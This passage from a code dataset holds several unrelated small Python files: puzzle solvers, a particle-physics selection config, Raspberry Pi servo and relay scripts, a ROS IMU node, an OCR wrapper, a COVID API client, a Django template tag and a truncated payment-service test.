+{"seq_id":"497079319","text":"a, b = map(int, input().split())\na = min(a, 9999999)\nb = min(b, 9999999)\n\ndef is_prime(n):\n if n == 1:\n return False\n else:\n for i in range(2, int(n**0.5)+1):\n if n % i == 0:\n return False\n return True\n\ndef is_palin(n):\n x = str(n)\n if len(x) == 1:\n return True\n if len(x) % 2 == 1:\n for i in range(len(x)-1, len(x)//2, -1):\n if x[i] != x[(len(x)-1) - i]:\n return False\n return True\n else:\n for i in range(len(x)-1, len(x)//2 - 1, -1):\n if x[i] != x[(len(x)-1) - i]:\n return False\n return True\n \nfor x in range(a, b+1):\n if is_palin(x) == True and is_prime(x) == True:\n print(x)\nprint(-1)\n","sub_path":"susie/BOJ/20220424_1990_소수인팰린드롬.py","file_name":"20220424_1990_소수인팰린드롬.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"310241853","text":"# -*- coding: utf-8 -*-\n\n#문자열 곱하기 숫자 하면 문자열이 그 숫자만큼 반복된다\n\ndef line1():\n print('+-----' * 6 +'+')\n\ndef line2():\n print('| ' * 6 +'|')\n\ndef line(m):\n if m==1:\n line2()\n line2()\n line1()\n else:\n line2()\n line2()\n line1()\n line(m-1)\n\nm = eval(input())\n\nline1()\nprint('| | MON | TUE | WED | THU | FRI |')\nline1()\n\nline(m)\n","sub_path":"Python_basic/lecture data/practice/Lab_02_MakingWeeklyTable3.py","file_name":"Lab_02_MakingWeeklyTable3.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"616659221","text":"import FWCore.ParameterSet.Config as cms\n\n## jet selector\nfrom PhysicsTools.PatAlgos.selectionLayer1.jetSelector_cfi import *\n## muon selector\nfrom PhysicsTools.PatAlgos.selectionLayer1.muonSelector_cfi import *\n## electron selector\nfrom PhysicsTools.PatAlgos.selectionLayer1.electronSelector_cfi import *\n\n## jet count filter\nfrom PhysicsTools.PatAlgos.selectionLayer1.jetCountFilter_cfi import *\n## muon count filter\nfrom PhysicsTools.PatAlgos.selectionLayer1.muonCountFilter_cfi import *\n## electron count filter\nfrom PhysicsTools.PatAlgos.selectionLayer1.electronCountFilter_cfi import *\n\n\n#-------------------------------------------------\n# cleaning\n#-------------------------------------------------\n\nfrom PhysicsTools.PatAlgos.cleaningLayer1.cleanPatCandidates_cff import *\n\n## Electron cleaning against muons\n\ncleanPatElectrons.src = \"selectedPatElectrons\"\n\ncleanPatElectrons.checkOverlaps.muons.preselection = cms.string( 'isGlobalMuon'\n '| isTrackerMuon'\n #'& abs(eta) < 2.4'\n #'& pt > 20.'\n #'& track.numberOfValidHits > 10'\n #'& abs(dB) < 0.02'\n #'& combinedMuon.normalizedChi2 < 10.0'\n #'& (trackIso+caloIso)/pt < 0.15'\n )\ncleanPatElectrons.checkOverlaps.muons.deltaR = 0.1\ncleanPatElectrons.checkOverlaps.muons.requireNoOverlaps = True\n\n## Jet cleaning against electrons & muons\n\n#cleanPatJets.src = \"selectedPatJetsAK5PF\"\n#cleanPatJets.src = \"selectedPatJets\"\ncleanPatJets.src = cms.InputTag(\"residualCorrectedJets\")\n\ncleanPatJets.checkOverlaps.muons.preselection = cms.string( 'isTrackerMuon'\n '& isGlobalMuon'\n '& abs(eta) < 2.4'\n '& pt > 20.'\n '& track.numberOfValidHits > 10'\n '& globalTrack.hitPattern.numberOfValidMuonHits > 0'\n\n '& abs(dB) < 0.02'\n '& combinedMuon.normalizedChi2 < 10.0'\n '& (trackIso+caloIso)/pt < 0.15'\n )\ncleanPatJets.checkOverlaps.muons.deltaR = 0.4\ncleanPatJets.checkOverlaps.muons.requireNoOverlaps = True\n\ncleanPatJets.checkOverlaps.electrons.src = 'cleanPatElectrons'\ncleanPatJets.checkOverlaps.electrons.preselection = cms.string( 'abs(eta) < 2.5'\n '& et > 15.'\n '& superCluster.energy > 15.'\n '& abs(dB) < 0.04'\n #'& hcalOverEcal < 0.05'\n '& ( electronID(\\\"simpleEleId90cIso\\\") = 5. '\n '| electronID(\\\"simpleEleId90cIso\\\") = 7. 
)'\n '& ( ( (abs(superCluster.eta)>1.479) & (dr03TkSumPt()+dr03EcalRecHitSumEt()+dr03HcalTowerSumEt())/max(20.,et) < 0.15)'\n '| ( (abs(superCluster.eta)<1.479) & (dr03TkSumPt()+max(0.,dr03EcalRecHitSumEt()-1.)+dr03HcalTowerSumEt())/max(20.,et) < 0.15 ) )'\n )\ncleanPatJets.checkOverlaps.electrons.deltaR = 0.4\ncleanPatJets.checkOverlaps.electrons.requireNoOverlaps = True\n\n\n\n###########################################################################################\n#\n# MUON SELECTION\n#\n###########################################################################################\n\n## muons in tracker range\ntightMuons = selectedPatMuons.clone(src = 'cleanPatMuons',\n cut = 'abs(eta) < 2.4'\n\t\t\t\t )\n## tracker muons\ntrackerMuons = selectedPatMuons.clone(src = 'tightMuons',\n cut = 'isTrackerMuon'\n\t\t\t\t )\n## muons reconstructed globally\nglobalMuons = selectedPatMuons.clone(src = 'trackerMuons',\n cut = 'isGlobalMuon'\n\t\t\t\t )\n## pt cut\nhardMuons = selectedPatMuons.clone(src = 'globalMuons',\n cut = 'pt > 20.'\n\t\t\t\t )\n## n_hits\ngoodTrackMuons = selectedPatMuons.clone(src = 'hardMuons',\n cut = 'track.numberOfValidHits > 10'\n\t\t\t\t )\n## at least one valid muon hit\nmuHitMuons = selectedPatMuons.clone(src = 'goodTrackMuons',\n cut = 'globalTrack.hitPattern.numberOfValidMuonHits > 0'\n\t\t\t\t )\n## transverse impact parameter\ngoodD0Muons = selectedPatMuons.clone(src = 'muHitMuons',\n cut = 'abs(dB) < 0.02'\n\t\t\t\t )\n## global fit\ngoodMuons = selectedPatMuons.clone(src = 'goodD0Muons',\n cut = 'combinedMuon.normalizedChi2 < 10.0'\n\t\t\t\t )\n## isolation cut\nisolatedMuons = selectedPatMuons.clone(src = 'goodMuons',\n cut = '(trackIso+caloIso)/pt < 0.15'\n\t\t\t\t )\n## this collection is needed to make sure that one muon is in trigger range\nisolatedTightMuons = selectedPatMuons.clone(src = 'isolatedMuons',\n cut = 'abs(eta) < 2.1'\n\t\t\t\t )\n\n\n## Count Filters with n >= 1 requirement for control plots\noneTightMuonSelection = countPatMuons.clone(src = 'tightMuons', minNumber = 1)\noneTrackerMuonSelection = countPatMuons.clone(src = 'trackerMuons', minNumber = 1)\noneGlobalMuonSelection = countPatMuons.clone(src = 'globalMuons', minNumber = 1)\noneHardMuonSelection = countPatMuons.clone(src = 'hardMuons', minNumber = 1)\noneGoodTrackMuonSelection = countPatMuons.clone(src = 'goodTrackMuons', minNumber = 1)\noneMuHitMuonSelection = countPatMuons.clone(src = 'muHitMuons', minNumber = 1)\noneGoodD0MuonSelection = countPatMuons.clone(src = 'goodD0Muons', minNumber = 1)\noneGoodMuonSelection = countPatMuons.clone(src = 'goodMuons', minNumber = 1)\n\n## Count Filters with n >= 2 requirement for finale selection \ntwoTightMuonSelection = countPatMuons.clone(src = 'tightMuons', minNumber = 2)\ntwoTrackerMuonSelection = countPatMuons.clone(src = 'trackerMuons', minNumber = 2)\ntwoGlobalMuonSelection = countPatMuons.clone(src = 'globalMuons', minNumber = 2)\ntwoHardMuonSelection = countPatMuons.clone(src = 'hardMuons', minNumber = 2)\ntwoGoodTrackMuonSelection = countPatMuons.clone(src = 'goodTrackMuons', minNumber = 2)\ntwoMuHitMuonSelection = countPatMuons.clone(src = 'muHitMuons', minNumber = 2)\ntwoGoodD0MuonSelection = countPatMuons.clone(src = 'goodD0Muons', minNumber = 2)\ntwoGoodMuonSelection = countPatMuons.clone(src = 'goodMuons', minNumber = 2)\n\n## Count Requirements for isolated muons\ntwoIsolatedMuonSelection = countPatMuons.clone(src = 'isolatedMuons', minNumber = 2)\noneIsolatedTightMuonSelection = countPatMuons.clone(src = 'isolatedTightMuons', 
minNumber = 1)\n\n\n###########################################################################################\n#\n# ELECTRON SELECTION\n#\n###########################################################################################\n\n## Build Collections\n\n# this if I do cleaning afterwards\n# centralElectrons = selectedPatElectrons.clone( src = 'selectedPatElectrons',\n# cut = 'abs(eta) < 2.5'\n# )\n\n# this is I do cleaning before\ncentralElectrons = selectedPatElectrons.clone( src = 'cleanPatElectrons',\n cut = 'abs(eta) < 2.5'\n )\n\nhighPtElectrons = selectedPatElectrons.clone( src = 'centralElectrons',\n cut = 'et > 20.'\n )\n\ngoodSCElectrons = selectedPatElectrons.clone( src = 'highPtElectrons',\n cut = 'superCluster.energy > 15.'\n )\n\ngoodD0Electrons = selectedPatElectrons.clone( src = 'goodSCElectrons',\n cut = 'abs(dB) < 0.04'\n )\n\n#HoverEmElectrons = selectedPatElectrons.clone( src = 'goodD0Electrons',\n# cut = 'hcalOverEcal < 0.05'\n# )\n\n# Select conv.rej. & ID only -> 5 OR 7\nidOnlyElectrons = selectedPatElectrons.clone( src = 'goodD0Electrons',\n cut = 'electronID(\\\"simpleEleId90cIso\\\") = 5.'\n '| electronID(\\\"simpleEleId90cIso\\\") = 7.'\n )\n\nisolatedElectrons = selectedPatElectrons.clone( src = 'idOnlyElectrons',\n cut = '( (abs(superCluster.eta)>1.479) & (dr03TkSumPt()+dr03EcalRecHitSumEt()+dr03HcalTowerSumEt())/max(20.,et) < 0.15 )'\n '| ( (abs(superCluster.eta)<1.479) & (dr03TkSumPt()+max(0.,dr03EcalRecHitSumEt()-1.)+dr03HcalTowerSumEt())/max(20.,et) < 0.15 )'\n )\n\n## exact one very tight selected tag electron\n\ncentralElectronSelection = countPatElectrons.clone(src = 'centralElectrons', minNumber = 1)\nhighPtElectronSelection = countPatElectrons.clone(src = 'highPtElectrons', minNumber = 1)\ngoodSCElectronSelection = countPatElectrons.clone(src = 'goodSCElectrons', minNumber = 1)\ngoodD0ElectronSelection = countPatElectrons.clone(src = 'goodD0Electrons', minNumber = 1)\nHoverEmElectronSelection = countPatElectrons.clone(src = 'HoverEmElectrons', minNumber = 1)\nidOnlyElectronSelection = countPatElectrons.clone(src = 'idOnlyElectrons', minNumber = 1)\nisolatedElectronSelection = countPatElectrons.clone(src = 'isolatedElectrons', minNumber = 1)\nonlyOneElectronSelection = countPatElectrons.clone(src = 'isolatedElectrons', minNumber = 1, maxNumber = 1)\n\n\n## Count Filters with n >= 2 requirement for finale selection \ntwoCentralElectronSelection = countPatElectrons.clone(src = 'centralElectrons', minNumber = 2)\ntwoHighPtElectronSelection = countPatElectrons.clone(src = 'highPtElectrons', minNumber = 2)\ntwoGoodSCElectronSelection = countPatElectrons.clone(src = 'goodSCElectrons', minNumber = 2)\ntwoGoodD0ElectronSelection = countPatElectrons.clone(src = 'goodD0Electrons', minNumber = 2)\ntwoHoverEmElectronSelection = countPatElectrons.clone(src = 'HoverEmElectrons', minNumber = 2)\ntwoIdOnlyElectronSelection = countPatElectrons.clone(src = 'idOnlyElectrons', minNumber = 2)\ntwoIsolatedElectronSelection = countPatElectrons.clone(src = 'isolatedElectrons', minNumber = 2)\nexactlyTwoElectronSelection = countPatElectrons.clone(src = 'isolatedElectrons', minNumber = 2, maxNumber = 2)\n\n\n## Count Requirements for isolated electrons\n# twoIsolatedElectronSelection = countPatElectrons.clone(src = 'isolatedElectrons', minNumber = 2)\n# isolatedElectronSelection = countPatElectrons.clone(src = 'isolatedElectrons', minNumber = 1)\n\n\n\n\n###########################################################################################\n#\n# JET 
SELECTION\n#\n###########################################################################################\n\n## Build Collections\n# this is needed for the new definition of PF id\nfrom TopAnalysis.TopFilter.filters.JetIdFunctorFilter_cfi import *\n## jet PF ID selection \n# cleanPatJets.src = cms.InputTag(\"selectedPatJetsAK5PF\")\n# cleanPatJets.src = cms.InputTag(\"residualCorrectedJets\") # for data\ngoodIdJets.jets = cms.InputTag(\"cleanPatJets\")\ngoodIdJets.jetType = cms.string('PF')\ngoodIdJets.version = cms.string('FIRSTDATA')\ngoodIdJets.quality = cms.string('LOOSE')\n\n## good jet selection\ngoodJets = selectedPatJets.clone( src = 'goodIdJets',\n cut = 'pt > 15.'\n )\n\n## tight jet selection\ntightJets = selectedPatJets.clone(src = 'goodJets',\n cut = 'abs(eta) < 2.5'\n )\n\n## hard jet selection\nhardJets = selectedPatJets.clone( src = 'tightJets',\n cut = 'pt > 30.'\n )\n\n\ngoodIdJetsPF = selectedPatJets.clone( src = 'hardJets')\n\n\n\n## check for different btag properties\ntrackCountingHighEffBJets = selectedPatJets.clone( src = 'goodIdJetsPF',\n cut = 'bDiscriminator(\\\"trackCountingHighEffBJetTags\\\") > 1.7'\n )\n\nsimpleSecondaryVertexBJets = selectedPatJets.clone( src = 'goodIdJetsPF',\n cut = 'bDiscriminator(\\\"simpleSecondaryVertexHighEffBJetTags\\\") > 1.74'\n )\n\n## Count Filters\nhardJetSelection = countPatJets.clone(src = 'hardJets', minNumber = 1, maxNumber = 999)\ntightJetSelection = countPatJets.clone(src = 'tightJets', minNumber = 1, maxNumber = 999)\noneGoodIdJetPFSelection = countPatJets.clone(src = 'goodIdJetsPF', minNumber = 1, maxNumber = 999)\ntwoGoodIdJetPFSelection = countPatJets.clone(src = 'goodIdJetsPF', minNumber = 2, maxNumber = 999)\nbJetTCHSelection = countPatJets.clone(src = 'trackCountingHighEffBJets', minNumber = 1, maxNumber = 999)\nbJetSSVSelection = countPatJets.clone(src = 'simpleSecondaryVertexBJets', minNumber = 1, maxNumber = 999)\n\n\n\n###########################################################################################\n#\n# MET SELECTION\n#\n###########################################################################################\n\n## met selector\nhighMETs = cms.EDFilter( \"PATMETSelector\",\n src = cms.InputTag(\"patMETsPF\"),\n cut = cms.string(\"et > 30.\")\n )\n\n## Count Filter\nmetSelection = cms.EDFilter(\"PATCandViewCountFilter\",\n minNumber = cms.uint32(1),\n maxNumber = cms.uint32(999999),\n src = cms.InputTag(\"highMETs\")\n )\n\n\n\n\n###########################################################################################\n#\n# SEQUENCES\n#\n###########################################################################################\napplyCleaning = cms.Sequence( cleanPatCandidates )\n\n\nbuildJets = cms.Sequence(goodIdJets *\n goodJets *\n\t\t\t tightJets *\n\t\t\t hardJets *\n goodIdJetsPF\n\t\t\t)\n\n\nrequireOneIsolatedElectronSelection = cms.Sequence( centralElectrons *\n centralElectronSelection *\n highPtElectrons *\n highPtElectronSelection *\n goodSCElectrons *\n goodSCElectronSelection *\n goodD0Electrons *\n goodD0ElectronSelection *\n #HoverEmElectrons *\n #HoverEmElectronSelection *\n idOnlyElectrons *\n idOnlyElectronSelection *\n isolatedElectrons *\n isolatedElectronSelection\n #onlyOneMuonSelection *\n #onlyOneElectronSelection\n )\n\n\n\nrequireTwoIsolatedElectrons = cms.Sequence(twoCentralElectronSelection *\n\t\t\t\t twoHighPtElectronSelection *\n\t\t\t\t twoGoodSCElectronSelection *\n \t\t\t twoGoodD0ElectronSelection *\n \t\t\t twoIdOnlyElectronSelection *\n \t\t\t 
twoIsolatedElectronSelection \n\t\t\t\t )\n\n\nonePFJetSelection = cms.Sequence( goodIdJets *\n goodJets *\n tightJets *\n tightJetSelection *\n hardJets *\n hardJetSelection *\n goodIdJetsPF *\n oneGoodIdJetPFSelection\n )\n\ntwoPFJetSelection = cms.Sequence( twoGoodIdJetPFSelection )\n\npfMETSelection = cms.Sequence( highMETs *\n metSelection\n )\n\nbTagSelection = cms.Sequence( trackCountingHighEffBJets *\n bJetTCHSelection\n # simpleSecondaryVertexBJets *\n # bJetSSVSelection\n )\n\n################################################################################\n#\n# HELPER FUNCTION\n#\n################################################################################\n\t\t# cleanPatJets.src = cms.InputTag(\"residualCorrectedJets\")\n","sub_path":"TopFilter/python/sequences/fullLeptonicElectronElectronSelectionDATA_cff.py","file_name":"fullLeptonicElectronElectronSelectionDATA_cff.py","file_ext":"py","file_size_in_byte":18084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"318401011","text":"import pi_servo_hat\nimport smbus, time\nimport datetime\nimport logging\n\nclass MotorDoor:\n \"\"\"A class than handles interactions with a servo motor driving the dog door\"\"\"\n def __init__(self,bus=1, motor_slot=0,addr=0x40, open_position=240,closed_position=420,jump_dist=5):\n self.logger = logging.getLogger(__name__)\n self.open_position = open_position\n self.closed_position = closed_position\n self.jump_dist = jump_dist\n\n self.bus = smbus.SMBus(bus)\n self.addr = addr\n\n self.rotation_position = self.closed_position\n self.opened_time = datetime.datetime.now().timestamp() - 10000 # something a longish time ago... we really don't know\n self.is_open = True\n\n ## Setup the motor\n time.sleep(1)\n self.bus.write_byte_data(addr, motor_slot, 0x20) # enables word writes\n time.sleep(.25)\n self.bus.write_byte_data(addr, motor_slot, 0x10) # enable Prescale change as noted in the datasheet\n time.sleep(.25) # delay for reset\n self.bus.write_byte_data(addr, 0xfe, 0x79) #changes the Prescale register value for 50 Hz, using the equation in the datasheet.\n self.bus.write_byte_data(addr, motor_slot, 0x20) # enables word writes\n time.sleep(.25)\n\n self.slow_close(0)\n \n def slow_open(self):\n if not self.is_open:\n self.logger.info(\"Opening door\")\n for i in range(self.closed_position,self.open_position,-1 * self.jump_dist):\n self.move_to(i)\n time.sleep(0.1)\n self.rotation_position = self.open_position\n self.opened_time = datetime.datetime.now().timestamp()\n else:\n self.move_to(self.open_position) # keep forcing open\n self.is_open = True\n \n def slow_close(self,min_time):\n if self.is_open:\n tm = datetime.datetime.now().timestamp()\n if tm - self.opened_time > min_time:\n self.logger.info(\"Closing door\")\n for i in range(self.open_position,self.closed_position,self.jump_dist):\n self.move_to(i)\n time.sleep(0.1)\n self.move_to(self.closed_position)\n self.rotation_position = self.closed_position\n self.is_open = False\n else:\n self.logger.debug(\"Door not closed due to timeout\")\n else:\n self.move_to(self.closed_position) # keep forcing open\n \n def move_to(self,move_to_position):\n #write start and stop to channel\n self.bus.write_word_data(self.addr, 0x06, 0) \n self.bus.write_word_data(self.addr, 0x08, move_to_position)\n\nif __name__ == \"__main__\":\n \n door = MotorDoor()\n door.slow_open()\n","sub_path":"src/test/motor_door.py","file_name":"motor_door.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"525073105","text":"# Toggles two relays and built-in LED\nimport utime\n\nfrom machine import Pin\ndef main():\n relay1 = Pin(12, Pin.OUT)\n relay2 = Pin(13, Pin.OUT)\n led1 = Pin(16, Pin.OUT)\n enabled = False\n while True:\n if enabled:\n relay1.off()\n relay2.on()\n led1.on()\n print('off')\n else:\n relay1.on()\n relay2.off()\n led1.off()\n print('on')\n utime.sleep_ms(1000)\n enabled = not enabled\n\nif __name__ == '__main__':\n main()\n","sub_path":"blink/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"236636988","text":"#!/usr/bin/python2.7\n\nimport rospy\nimport tf\nfrom sensor_msgs.msg import Imu\nimport os\nimport numpy as np\nPATH = os.path.dirname(os.path.abspath(__file__))\nprint(PATH)\n\nclass CSVManager:\n def __init__(self, file_path):\n self.f = open(file_path,'w+')\n\n def writer(self, data_list=[]):\n if len(data_list) == 0:\n return True\n data = data_list\n if type(data_list[0]) in [int, float]:\n data = []\n for d in data_list:\n data.append(str(d))\n data = \", \".join(data)\n self.f.write(data+\"\\n\")\n\n def reader(self):\n # not now\n pass \n\nclass SensorFusion:\n def __init__(self,axis=0):\n rospy.init_node(\"SensorFusion\",anonymous=True)\n rospy.Subscriber(\"/imu/data\",Imu, self.imu_callback)\n # rospy.Subscriber(\"/gx4_45_imu/data\",Imu, self.imu_callback)\n \n self.orientation = None\n self.euler = [0,0,0]\n self.old_acc = [0,0,0]\n self.acc = [[0],[0],[0]]\n # self.csv = CSVManager(PATH + \"/csv/compare_old_new.csv\")\n self.count = 0\n self.axis = axis\n self.sampling = 50\n\n def imu_callback(self,msg):\n self.acc[0].append(msg.linear_acceleration.x) \n self.acc[1].append(msg.linear_acceleration.y) \n self.acc[2].append(msg.linear_acceleration.z) \n # self.quaternion = (\n # msg.orientation.x,\n # msg.orientation.y,\n # msg.orientation.z,\n # msg.orientation.w\n # )\n # self.euler = tf.transformations.euler_from_quaternion(self.quaternion)\n # print(self.euler)\n self.run()\n\n def run(self):\n if len(self.acc[self.axis]) > 0 and len(self.acc[self.axis]) % self.sampling == 0:\n # # print(\"Count: \" + str(count*self.sampling)+\" Mean | Max | Min | Variance | Total Variance |\")\n # mean = np.mean(self.acc[self.axis][self.count*self.sampling:self.count*self.sampling + self.sampling])\n # max = np.max(self.acc[self.axis][self.count*self.sampling:self.count*self.sampling + self.sampling])\n # min = np.min(self.acc[self.axis][self.count*self.sampling:self.count*self.sampling + self.sampling])\n # var = np.var(self.acc[self.axis][self.count*self.sampling:self.count*self.sampling + self.sampling])\n mean = np.mean(self.acc[self.axis][1:self.count*self.sampling + self.sampling])\n max = np.max(self.acc[self.axis][1:self.count*self.sampling + self.sampling])\n min = np.min(self.acc[self.axis][1:self.count*self.sampling + self.sampling])\n var = np.var(self.acc[self.axis][1:self.count*self.sampling + self.sampling])\n # var = np.var(self.acc[self.axis][1:])\n range = abs(max - min)\n self.count += 1\n if self.count % 20 == 0 and self.count > 0:\n print(\"=============================== Axis: %s ========================================\"%self.axis)\n print(\"%8s %10s %10s %10s %10s %14s %14s\" %(\"Count |\", \"Mean |\", \"Max |\" ,\"Min |\",\"Range |\" ,\"Variance |\", \"Total Variance |\"))\n print(\"%6d | %+7.6f | %+7.6f | %+7.6f | %+7.6f | %+9.10f | %+9.10f |\"%(self.count*self.sampling,mean,max,min,range,var,var))\n\nif __name__ == '__main__':\n axis = raw_input(\"Axis: \")\n ax = {'x':0,'y':1,'z':2}\n sf = SensorFusion(ax[axis.lower()])\n print(\"=============================== Axis: %s ========================================\"%axis)\n print(\"%8s %10s %10s %10s %10s %14s %14s\" %(\"Count |\", \"Mean |\", \"Max |\" ,\"Min |\",\"Range |\" ,\"Variance |\", \"Total Variance |\"))\n rospy.spin()","sub_path":"zeabus_sensor/scripts/imu_filter.py","file_name":"imu_filter.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"471764430","text":"# coding: utf-8\n\n'''\n@ tesseract\nbrew install tesseract\n\n@ guide\nhttps://pypi.python.org/pypi/pytesseract\nhttp://www.cnblogs.com/wzben/p/5930538.html\nhttp://www.cnblogs.com/wzben/p/5930538.html\nhttp://www.pyimagesearch.com/2017/07/10/using-tesseract-ocr-python/\n'''\nimport os\nimport subprocess\nimport logging\n\nlogger = logging.getLogger('ocr')\nformatter = logging.Formatter('%(asctime)s, %(levelname)s %(message)s')\nsh = logging.StreamHandler()\nsh.setFormatter(formatter)\nlogger.addHandler(sh)\n\ndef image_to_string(img, cleanup=True, plus=''):\n # cleanup为True则识别完成后删除生成的文本文件\n # plus参数为给tesseract的附加高级参数\n if not os.path.exists(img):\n logger.error(\"%s doesn't exist\", img)\n return ''\n subprocess.check_output('tesseract ' + img + ' ' +\n img + ' ' + plus, shell=True) # 生成同名txt文件\n text = ''\n with open(img + '.txt', 'r') as f:\n text = f.read().strip()\n if cleanup:\n os.remove(img + '.txt')\n return text\n\n\nif __name__ == '__main__':\n # try:\n # import Image\n # except ImportError:\n # from PIL import Image\n # import pytesseract\n #\n # pytesseract.pytesseract.tesseract_cmd = '/usr/local/Cellar/tesseract/3.05.01/'\n # # Include the above line, if you don't have tesseract executable in your PATH\n # # Example tesseract_cmd: 'C:\\\\Program Files (x86)\\\\Tesseract-OCR\\\\tesseract'\n #\n # print(pytesseract.image_to_string(Image.open('test.png')))\n # print(pytesseract.image_to_string(Image.open('test.png'), lang='fra'))\n\n # print(image_to_string('./test.png', True, '-l chi_sim'))\n print(image_to_string('./test5.png'))\n\n\n\n","sub_path":"longling/framework/ocr/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"18256851","text":"\"\"\"\"Classes and models for handling COVID data from the `disease.sh` API.\"\"\"\nfrom datetime import datetime\nfrom typing import List, Literal, Mapping, Optional, Union\n\nfrom loguru import logger\nfrom pydantic import BaseModel\n\nfrom heatmaps.data import abc\n\n\nclass Statistic(BaseModel):\n \"\"\"\n Represents a statistic dictionary. (Refer `schema.md`)\n \"\"\"\n\n stat: str\n count: int\n\n\nclass Country(BaseModel):\n \"\"\"\n Represents a country's data in the format that it is stored in the database.\n \"\"\"\n\n country: str\n population: int\n statistics: List[Statistic]\n\n\nclass CovidDataDocument(BaseModel):\n api: str\n time: datetime\n data: List[Country]\n\n\nclass Covid(abc.AbstractAPIClient):\n API_URL = \"https://disease.sh/\"\n SAVED_STATS = {\"cases\", \"todayCases\", \"deaths\", \"todayDeaths\", \"recovered\", \"tests\"}\n\n async def fetch_data(self) -> Optional[list]: # the endpoint returns a list\n async with self.app.ctx.http_session.get(\n Covid.API_URL + \"v3/covid-19/countries\"\n ) as resp:\n if resp.status == 200:\n logger.trace(\" Fetched COVID data\")\n return await resp.json()\n else:\n logger.warning(\n f\" API returned non-200 status code ({resp.status}), could not fetch data\"\n )\n\n def parse_data(self, data: list) -> dict:\n final = {\"api\": \"covid\", \"time\": datetime.utcnow(), \"data\": []}\n\n for country in data:\n country_dict = {\n \"country\": country[\"country\"],\n \"population\": country[\"population\"],\n \"statistics\": [],\n }\n\n for stat in Covid.SAVED_STATS:\n country_dict[\"statistics\"].append(\n {\"stat\": stat, \"count\": country[stat]}\n )\n\n final[\"data\"].append(country_dict)\n\n # validation using pydantic (this eliminates the need to test this function)\n CovidDataDocument.parse_obj(final)\n\n logger.trace(\" Data parsed\")\n return final\n\n async def insert_data(self, data: dict) -> None:\n await self.collection.replace_one({\"api\": \"covid\"}, data, upsert=True)\n logger.info(\" Data inserted to database\")\n\n def normalize(self, value: int, total: int) -> float:\n # TODO: think this through, and write tests\n return (value / total) * 10\n\n async def collect_data(self) -> None:\n raw = await self.fetch_data()\n if raw is None:\n logger.error(\" Data could not be retrieved, stopping collection\")\n return\n parsed = self.parse_data(raw)\n await self.insert_data(parsed)\n logger.info(\" Data collection completed\")\n\n async def retrieve_data(self) -> Optional[CovidDataDocument]:\n \"\"\"\n Entrypoint function to retrieve stored data on-demand.\n\n Returns:\n CovidDataDocument: A Pydantic validated model\n \"\"\"\n data = await self.collection.find_one({\"api\": \"covid\"})\n\n if data is None:\n logger.warning(\" No pre-existing data in the database\")\n return\n\n return CovidDataDocument.parse_obj(data)\n\n\nStatisticType = Union[\n Literal[\"cases\"],\n Literal[\"todayCases\"],\n Literal[\"deaths\"],\n Literal[\"todayDeaths\"],\n Literal[\"recovered\"],\n Literal[\"tests\"],\n]\n\n\ndef filter_by_stat(data: CovidDataDocument, stat: StatisticType) -> List[Mapping]:\n \"\"\"\n Filters the entire COVID data stored in the database\n to leave just the relevant statistic.\n \"\"\"\n out = []\n\n for country in data.data:\n new_country = {\"country\": country.country, \"population\": country.population}\n\n for statistic_dict in country.statistics:\n if statistic_dict.stat == stat:\n new_country[\"statistics\"] = statistic_dict\n break\n\n out.append(new_country)\n\n return 
out\n","sub_path":"heatmaps/data/covid.py","file_name":"covid.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"545694482","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/wenlincms/generic/templatetags/rating_tags.py\n# Compiled at: 2016-05-20 23:42:06\nfrom __future__ import unicode_literals\nfrom wenlincms import template\nfrom wenlincms.generic.forms import RatingForm\nregister = template.Library()\n\n@register.inclusion_tag(b'generic/includes/rating.html', takes_context=True)\ndef rating_for(context, obj):\n \"\"\"\n Provides a generic context variable name for the object that\n ratings are being rendered for, and the rating form.\n \"\"\"\n context[b'rating_object'] = context[b'rating_obj'] = obj\n context[b'rating_form'] = RatingForm(context[b'request'], obj)\n ratings = context[b'request'].COOKIES.get(b'wenlincms-rating', b'')\n rating_string = b'%s.%s' % (obj._meta, obj.pk)\n context[b'rated'] = rating_string in ratings\n rating_name = obj.get_ratingfield_name()\n for f in ('average', 'count', 'sum'):\n context[b'rating_' + f] = getattr(obj, b'%s_%s' % (rating_name, f))\n\n return context","sub_path":"pycfiles/wenlincms-2.7.1-py2.7/rating_tags.py","file_name":"rating_tags.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"486983371","text":"from decimal import Decimal\n\nimport pytest\nfrom django.test import TestCase\n\nfrom api.booking.booking_model import Payment, PaymentMethod, SubmitErrorType\nfrom api.common.models import Money, Address\nfrom api.models.models import PaymentTransaction\nfrom api.payments import payment_service\nfrom api.view.exceptions import PaymentException\nfrom api.tests import test_objects\nfrom api.tests.integration import test_stripe\n\n\nclass TestPaymentService(TestCase):\n def test_authorize_payment_token(self):\n payment_token = test_stripe.create_test_token(\"4242424242424242\")\n\n amount = Money(Decimal(\"1.00\"), \"USD\")\n payment = Payment(\n payment_card_parameters=None,\n billing_address=Address(\n address1=\"123 Street Way\", city=\"San Francisco\", province=\"CA\", country=\"US\", postal_code=\"94111\"\n ),\n payment_token=payment_token,\n payment_method=PaymentMethod.PAYMENT_TOKEN,\n )\n\n payment_description = \"Test Payment\"\n\n result = payment_service.authorize_payment(amount, payment, payment_description)\n assert result.charge_id is not None\n\n retrieved_transaction = 